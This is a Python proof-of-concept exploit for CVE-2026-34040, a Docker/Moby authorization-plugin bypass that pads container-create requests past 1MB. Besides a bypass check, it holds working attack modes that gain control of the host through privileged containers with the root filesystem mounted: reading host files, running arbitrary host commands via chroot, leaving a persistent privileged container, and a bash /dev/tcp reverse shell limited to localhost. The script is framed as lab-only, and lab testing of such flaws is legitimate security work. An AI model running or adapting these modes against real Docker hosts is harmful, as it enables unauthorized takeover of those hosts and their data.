#!/usr/bin/env python3
"""
CVE-2026-34040 Lab PoC - Docker/Moby AuthZ plugin bypass via oversized request body.

Verified facts:
  CVE        : CVE-2026-34040
  CVSS 3.1   : 8.8 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
  CWE        : CWE-288, CWE-863
  Affected   : moby/moby < 29.3.1, moby/moby/v2 < 2.0.0-beta.8
  Fixed in   : 29.3.1, 2.0.0-beta.8
  Root cause : incomplete fix for CVE-2024-41110
  Mechanism  : a request body > maxBodySize (1MB in vulnerable versions) makes
               the daemon forward an EMPTY body to the AuthZ plugin while the
               daemon itself processes the full original request -> AuthZ bypass.

Modes:
  check                Compare small request vs oversized request.
  read-host-file       Read a host file through privileged container + host bind mount.
  rce-proof            Write a marker file on the host using chroot.
  host-command         Run a user-provided command on the host through chroot.
  shell-container      Create and start a long-running privileged container for manual chroot.
  reverse-shell-local  Local lab reverse shell using host network mode.

Scope limitations:
  - Local UNIX socket only (/var/run/docker.sock); matches the official AV:L (Local) vector.
  - No remote TCP Docker API support
  - No scanning
  - Intended for authorized lab environments only
"""

from __future__ import annotations

import argparse
import json
import os
import re
import shlex
import socket
import sys
import time
from typing import Optional, Tuple

DEFAULT_SOCKET = "/var/run/docker.sock"
DEFAULT_API_VERSION = "v1.51"
DEFAULT_IMAGE = "alpine"
PADDING_SIZE = 1024 * 1024 + 1

LABEL_BASE = {
    "poc": "cve-2026-34040-full-lab",
    "lab_only": "true",
}

# Characters allowed in the size field of an HTTP chunk header.
HEX_DIGITS = frozenset(b"0123456789abcdefABCDEF")


def oversized_labels() -> dict:
    """Return a copy of LABEL_BASE plus a ``padding`` label of PADDING_SIZE characters."""
    labels = dict(LABEL_BASE)
    labels["padding"] = "A" * PADDING_SIZE
    return labels


def decode_chunked_body(body: bytes) -> bytes:
    """Strip HTTP/1.1 chunked transfer framing from *body*.

    Returns the concatenated chunk payloads. If *body* does not look like
    chunked framing (no CRLF-terminated size line, or a size field that is
    not plain hex) it is returned unchanged, so calling this on an already
    plain body is harmless. A stream cut off before the terminating
    zero-size chunk yields whatever payload was received.
    """
    pieces = []
    pos = 0
    while pos < len(body):
        eol = body.find(b"\r\n", pos)
        if eol == -1:
            break
        # Chunk extensions (";name=value") may follow the size; ignore them.
        size_field = body[pos:eol].split(b";", 1)[0].strip()
        if not size_field or not set(size_field) <= HEX_DIGITS:
            return body
        size = int(size_field, 16)
        if size == 0:
            # Terminating chunk; anything after it is trailers.
            return b"".join(pieces)
        start = eol + 2
        pieces.append(body[start:start + size])
        pos = start + size + 2  # skip the payload and its trailing CRLF
    return b"".join(pieces) if pieces else body


def parse_http_response(raw: bytes) -> Tuple[int, str, bytes]:
    """Split a raw HTTP response into ``(status_code, status_line, body)``.

    ``status_code`` is 0 when the status line is missing or malformed (for
    example when nothing was received). The body is de-chunked when the
    response headers declare ``Transfer-Encoding: chunked``.
    """
    header, _, body = raw.partition(b"\r\n\r\n")
    header_lines = header.split(b"\r\n")
    status_line = header_lines[0].decode("latin-1", errors="replace")
    try:
        status_code = int(status_line.split()[1])
    except (IndexError, ValueError):
        status_code = 0

    for line in header_lines[1:]:
        field, sep, value = line.partition(b":")
        if sep and field.strip().lower() == b"transfer-encoding" and b"chunked" in value.lower():
            body = decode_chunked_body(body)
            break
    return status_code, status_line, body


def demux_log_stream(body: bytes) -> bytes:
    """Remove Docker's multiplexed-stream frame headers from a log body.

    The Docker Engine API documents that, for containers created without a
    TTY, log/attach output is a sequence of frames, each preceded by an
    8-byte header: stream type (0, 1 or 2), three zero bytes, and a
    big-endian uint32 payload length. If *body* is not an exact sequence of
    such frames it is returned unchanged.
    """
    payloads = []
    pos = 0
    total = len(body)
    while pos < total:
        header = body[pos:pos + 8]
        if len(header) < 8 or header[0] not in (0, 1, 2) or header[1:4] != b"\x00\x00\x00":
            return body
        end = pos + 8 + int.from_bytes(header[4:8], "big")
        if end > total:
            return body
        payloads.append(body[pos + 8:end])
        pos = end
    return b"".join(payloads)


def docker_request(
    sock_path: str,
    method: str,
    path: str,
    body: bytes = b"",
    timeout: int = 20,
) -> Tuple[int, str, bytes]:
    """Send one HTTP/1.1 request over the UNIX socket and read the full reply.

    Args:
        sock_path: Filesystem path of the Docker UNIX socket.
        method: HTTP method, e.g. ``"POST"``.
        path: Request target including API version prefix and query string.
        body: Raw request body.
        timeout: Socket timeout in seconds.

    Returns:
        ``(status_code, status_line, response_body)``; see
        :func:`parse_http_response`.

    Raises:
        FileNotFoundError: if *sock_path* does not exist.
        OSError: for connection-level failures (permission, refused, ...).
    """
    if not os.path.exists(sock_path):
        raise FileNotFoundError(f"Docker socket not found: {sock_path}")

    req = (
        f"{method} {path} HTTP/1.1\r\n"
        "Host: docker\r\n"
        "User-Agent: cve-2026-34040-full-lab-poc\r\n"
        "Content-Type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("utf-8") + body

    chunks = []
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect(sock_path)
        s.sendall(req)
        # "Connection: close" was requested, so read until the peer closes.
        while True:
            try:
                data = s.recv(65536)
            except socket.timeout:
                # Best effort: keep whatever arrived before the timeout.
                break
            if not data:
                break
            chunks.append(data)

    return parse_http_response(b"".join(chunks))


def json_body(payload: dict) -> bytes:
    """Serialize *payload* as compact UTF-8 JSON."""
    return json.dumps(payload, separators=(",", ":")).encode("utf-8")


def parse_json_response(body: bytes) -> dict:
    """Decode *body* as a JSON object; return ``{}`` for anything else.

    Invalid JSON and valid JSON that is not an object (list, string,
    number, ...) both yield an empty dict so callers can use ``.get``.
    """
    try:
        data = json.loads(body.decode("utf-8", errors="replace"))
    except ValueError:
        return {}
    return data if isinstance(data, dict) else {}


def extract_container_id(body: bytes) -> Optional[str]:
    """Return the non-empty string ``Id`` field of a JSON response, else None."""
    cid = parse_json_response(body).get("Id")
    if isinstance(cid, str) and cid:
        return cid
    return None


def print_response(prefix: str, status_line: str, body: bytes, max_body: int = 400) -> None:
    """Print the status line and, if present, the first *max_body* bytes of *body*."""
    print(f"{prefix}: {status_line}")
    if body:
        text = body[:max_body].decode("utf-8", errors="replace")
        print(f"{prefix} body: {text}")


def print_banner(title: str) -> None:
    """Print *title* framed by two 72-character rules."""
    print("=" * 72)
    print(title)
    print("=" * 72)


def create_container(
    sock: str,
    api: str,
    name: str,
    payload: dict,
    timeout: int,
) -> Tuple[int, str, bytes, Optional[str]]:
    """POST a container-create request.

    Returns ``(status_code, status_line, response_body, container_id)``
    where ``container_id`` is None if the response carried no ``Id``.
    """
    path = f"/{api}/containers/create?name={name}"
    status, line, resp = docker_request(sock, "POST", path, json_body(payload), timeout)
    return status, line, resp, extract_container_id(resp)


def start_container(sock: str, api: str, cid: str, timeout: int) -> Tuple[int, str, bytes]:
    """POST a start request for container *cid*."""
    return docker_request(sock, "POST", f"/{api}/containers/{cid}/start", b"", timeout)


def logs_container(sock: str, api: str, cid: str, timeout: int) -> Tuple[int, str, bytes]:
    """GET stdout+stderr logs for container *cid*.

    The body has multiplexed-stream frame headers removed when present
    (see :func:`demux_log_stream`).
    """
    status, line, body = docker_request(
        sock,
        "GET",
        f"/{api}/containers/{cid}/logs?stdout=true&stderr=true",
        b"",
        timeout,
    )
    return status, line, demux_log_stream(body)


def remove_container(sock: str, api: str, cid: str, timeout: int) -> None:
    """Force-remove container *cid* and report the outcome on stdout."""
    status, line, body = docker_request(
        sock,
        "DELETE",
        f"/{api}/containers/{cid}?force=true",
        b"",
        timeout,
    )
    if status in (204, 404):
        print(f"[cleanup] removed or already gone: {cid[:12]}")
    else:
        print_response("[cleanup warning]", line, body)


def wait_short() -> None:
    """Sleep briefly so a just-started container can produce output."""
    time.sleep(1.2)


def require_explicit_host_execution(args: argparse.Namespace) -> None:
    """Exit with status 2 unless --i-understand-this-runs-on-host was given."""
    if not args.i_understand_this_runs_on_host:
        print(
            "This mode can execute commands on the host in your lab.\n"
            "Re-run with --i-understand-this-runs-on-host if this is your authorized test VM.",
            file=sys.stderr,
        )
        raise SystemExit(2)


def launch_container(
    args: argparse.Namespace,
    name: str,
    payload: dict,
    announce: bool = True,
) -> Optional[str]:
    """Create and start a container, printing both API responses.

    Returns the container id, or None (after printing a notice) when the
    create call returned no id. With *announce* the id is printed between
    the create and start steps.
    """
    _, line, body, cid = create_container(
        args.socket, args.api_version, name, payload, args.timeout
    )
    print_response("[create]", line, body)
    if not cid:
        print("No container was created.")
        return None

    if announce:
        print(f"[container] {cid}")

    _, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[start]", start_line, start_body)
    return cid


def show_logs(args: argparse.Namespace, cid: str) -> None:
    """Wait briefly, then fetch and print up to 4000 bytes of container logs."""
    wait_short()
    _, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[logs]", log_line, log_body, max_body=4000)


def finish_container(args: argparse.Namespace, cid: str) -> None:
    """Remove the container unless --keep was given, in which case say so."""
    if args.keep:
        print(f"[keep] container kept: {cid}")
    else:
        remove_container(args.socket, args.api_version, cid, args.timeout)


def build_check_payload(image: str, oversized: bool) -> dict:
    """Build the create payload used by check mode, padded when *oversized*."""
    labels = oversized_labels() if oversized else dict(LABEL_BASE)
    return {
        "Image": image,
        "Cmd": ["true"],
        "HostConfig": {
            "Privileged": True
        },
        "Labels": labels,
    }


def mode_check(args: argparse.Namespace) -> int:
    """Send a small and an oversized create request and compare the outcomes."""
    unique = int(time.time())
    small_name = f"cve-34040-small-{unique}"
    big_name = f"cve-34040-big-{unique}"

    print_banner("CVE-2026-34040 AuthZ bypass check")

    small_payload = build_check_payload(args.image, oversized=False)
    big_payload = build_check_payload(args.image, oversized=True)

    print("[1] Small request: AuthZ should block this")
    print(f" payload size: {len(json_body(small_payload))} bytes")
    s_status, s_line, s_body, s_id = create_container(
        args.socket, args.api_version, small_name, small_payload, args.timeout
    )
    print_response(" response", s_line, s_body)
    if s_id and not args.keep:
        remove_container(args.socket, args.api_version, s_id, args.timeout)

    print()
    print("[2] Oversized request: vulnerable target may pass AuthZ")
    print(f" payload size: {len(json_body(big_payload))} bytes")
    b_status, b_line, b_body, b_id = create_container(
        args.socket, args.api_version, big_name, big_payload, args.timeout
    )
    print_response(" response", b_line, b_body)
    if b_id and not args.keep:
        remove_container(args.socket, args.api_version, b_id, args.timeout)

    print()
    print_banner("Interpretation")

    if s_status != 403:
        print("[!] Baseline request was not blocked. AuthZ policy may not be enforcing privileged checks.")
    elif b_status == 403:
        print("[-] Oversized request was blocked. Target appears patched/protected.")
    elif b_status in (201, 404, 400, 409):
        print("[+] Bypass behavior observed: small request was denied, oversized request reached Docker processing.")
        if b_status == 404:
            # Name the image actually requested rather than a fixed default.
            print(f" 404 usually means the image is missing. Run: sudo docker pull {args.image}")
    else:
        print("[?] Inconclusive. Review response details manually.")

    return 0


def mode_read_host_file(args: argparse.Namespace) -> int:
    """Print the contents of --host-file via a container with / bound read-only."""
    unique = int(time.time())
    name = f"cve-34040-read-{unique}"
    host_file = args.host_file

    if not host_file.startswith("/"):
        print("--host-file must be an absolute path like /etc/hostname", file=sys.stderr)
        return 2

    # Avoid shell interpolation: pass file path directly to cat.
    payload = {
        "Image": args.image,
        "Cmd": ["cat", f"/host{host_file}"],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host:ro"],
        },
        "Labels": oversized_labels(),
    }

    print_banner("CVE-2026-34040 impact demo: read host file")
    print(f"target host file: {host_file}")

    cid = launch_container(args, name, payload)
    if cid is None:
        return 1

    show_logs(args, cid)
    finish_container(args, cid)
    return 0


def mode_rce_proof(args: argparse.Namespace) -> int:
    """Write a marker file on the host through chroot and print it back."""
    require_explicit_host_execution(args)

    unique = int(time.time())
    name = f"cve-34040-rce-proof-{unique}"
    marker = "/tmp/cve_2026_34040_rce_proof"

    host_cmd = (
        f"id > {shlex.quote(marker)}; "
        f"hostname >> {shlex.quote(marker)}; "
        f"whoami >> {shlex.quote(marker)}; "
        f"date >> {shlex.quote(marker)}"
    )

    payload = {
        "Image": args.image,
        "Cmd": [
            "/bin/sh",
            "-c",
            f"chroot /host /bin/bash -lc {shlex.quote(host_cmd)} && cat /host{marker}",
        ],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host"],
        },
        "Labels": oversized_labels(),
    }

    print_banner("CVE-2026-34040 impact demo: host RCE proof")
    print(f"marker file on host: {marker}")

    cid = launch_container(args, name, payload)
    if cid is None:
        return 1

    show_logs(args, cid)

    print()
    print("Verify on host:")
    print(f" cat {marker}")
    print("Cleanup:")
    print(f" sudo rm -f {marker}")

    finish_container(args, cid)
    return 0


def mode_host_command(args: argparse.Namespace) -> int:
    """Run the --cmd string on the host through chroot and print its output."""
    require_explicit_host_execution(args)

    if not args.cmd:
        print("--cmd is required for host-command mode", file=sys.stderr)
        return 2

    unique = int(time.time())
    name = f"cve-34040-host-cmd-{unique}"

    payload = {
        "Image": args.image,
        "Cmd": [
            "/bin/sh",
            "-c",
            f"chroot /host /bin/bash -lc {shlex.quote(args.cmd)}",
        ],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host"],
        },
        "Labels": oversized_labels(),
    }

    print_banner("CVE-2026-34040 impact demo: host command")
    print(f"command: {args.cmd}")

    cid = launch_container(args, name, payload)
    if cid is None:
        return 1

    show_logs(args, cid)
    finish_container(args, cid)
    return 0


def mode_shell_container(args: argparse.Namespace) -> int:
    """Start a long-running privileged container and print manual demo steps.

    The container is always left running; --keep only suppresses the note
    explaining that.
    """
    unique = int(time.time())
    name = f"cve-34040-shell-{unique}"

    payload = {
        "Image": args.image,
        "Cmd": ["sleep", "infinity"],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host"],
        },
        "Labels": oversized_labels(),
    }

    print_banner("CVE-2026-34040 impact demo: long-running privileged container")

    # The id is printed in its own section below, so skip the inline notice.
    cid = launch_container(args, name, payload, announce=False)
    if cid is None:
        return 1

    print()
    print("[container]")
    print(cid)
    print()
    print("Manual demo commands:")
    print(f" sudo docker exec -it {cid} /bin/sh")
    print(" chroot /host /bin/bash")
    print(" id")
    print(" hostname")
    print(" whoami")
    print()
    print("Cleanup:")
    print(f" sudo docker rm -f {cid}")

    if not args.keep:
        print()
        print("[note] This mode is useful with --keep. Container is kept by default for this mode.")

    print(f"[keep] container kept: {cid}")
    return 0


def mode_reverse_shell_local(args: argparse.Namespace) -> int:
    """Start a host-network container that connects a shell to a local listener.

    Only 127.0.0.1/localhost is accepted for --lhost, by design. The
    container is not removed automatically; a cleanup command is printed.
    """
    require_explicit_host_execution(args)

    if args.lhost not in ("127.0.0.1", "localhost"):
        print(
            "reverse-shell-local only allows --lhost 127.0.0.1 or localhost.\n"
            "This is intentional so the packaged lab PoC stays local-only.",
            file=sys.stderr,
        )
        return 2

    if not (1 <= args.lport <= 65535):
        print("--lport must be between 1 and 65535", file=sys.stderr)
        return 2

    unique = int(time.time())
    name = f"cve-34040-revshell-local-{unique}"

    rev_cmd = f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"

    payload = {
        "Image": args.image,
        "Cmd": [
            "/bin/sh",
            "-c",
            f"chroot /host /bin/bash -lc {shlex.quote(rev_cmd)}",
        ],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host"],
            "NetworkMode": "host",
        },
        "Labels": oversized_labels(),
    }

    print_banner("CVE-2026-34040 impact demo: local reverse shell")
    print("Before running this mode, open another terminal on the same VM:")
    print(f" nc -lvnp {args.lport}")
    print()
    print(f"reverse shell target: {args.lhost}:{args.lport}")

    cid = launch_container(args, name, payload)
    if cid is None:
        return 1

    print()
    print("If listener is open, the shell should connect there.")
    print("Cleanup after demo:")
    print(f" sudo docker rm -f {cid}")

    if args.keep:
        print(f"[keep] container kept: {cid}")

    return 0


# Mode name -> handler; insertion order is also the order of --mode choices.
MODE_HANDLERS = {
    "check": mode_check,
    "read-host-file": mode_read_host_file,
    "rce-proof": mode_rce_proof,
    "host-command": mode_host_command,
    "shell-container": mode_shell_container,
    "reverse-shell-local": mode_reverse_shell_local,
}


def build_parser() -> argparse.ArgumentParser:
    """Build the command-line parser for all modes."""
    parser = argparse.ArgumentParser(
        description="CVE-2026-34040 full lab PoC over local Docker UNIX socket"
    )

    parser.add_argument(
        "--mode",
        choices=list(MODE_HANDLERS),
        default="check",
        help="PoC mode",
    )

    parser.add_argument("--socket", default=DEFAULT_SOCKET, help="Docker UNIX socket path")
    parser.add_argument("--api-version", default=DEFAULT_API_VERSION, help="Docker API version, e.g. v1.51")
    parser.add_argument("--image", default=DEFAULT_IMAGE, help="Container image to use")
    parser.add_argument("--timeout", type=int, default=20, help="Socket timeout in seconds")
    parser.add_argument("--keep", action="store_true", help="Keep created containers where applicable")

    parser.add_argument("--host-file", default="/etc/hostname", help="Host file path for read-host-file mode")
    parser.add_argument("--cmd", help="Host command for host-command mode")

    parser.add_argument("--lhost", default="127.0.0.1", help="Local reverse shell host. Only 127.0.0.1/localhost allowed")
    parser.add_argument("--lport", type=int, default=4444, help="Local reverse shell port")

    parser.add_argument(
        "--i-understand-this-runs-on-host",
        action="store_true",
        help="Required for modes that execute commands on the host in the lab",
    )

    return parser


def main() -> int:
    """Parse arguments, run the selected mode, and return its exit status."""
    args = build_parser().parse_args()

    handler = MODE_HANDLERS.get(args.mode)
    if handler is None:
        # argparse already restricts --mode; kept as a defensive fallback.
        print(f"Unknown mode: {args.mode}", file=sys.stderr)
        return 2
    return handler(args)


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except PermissionError:
        print("Permission denied. Try sudo or an account that can access /var/run/docker.sock.", file=sys.stderr)
        raise SystemExit(1)
    except FileNotFoundError as e:
        print(str(e), file=sys.stderr)
        raise SystemExit(1)
    except OSError as e:
        # Connection refused, broken pipe, connect timeout, ...: report
        # the failure without a traceback.
        print(f"Socket error: {e}", file=sys.stderr)
        raise SystemExit(1)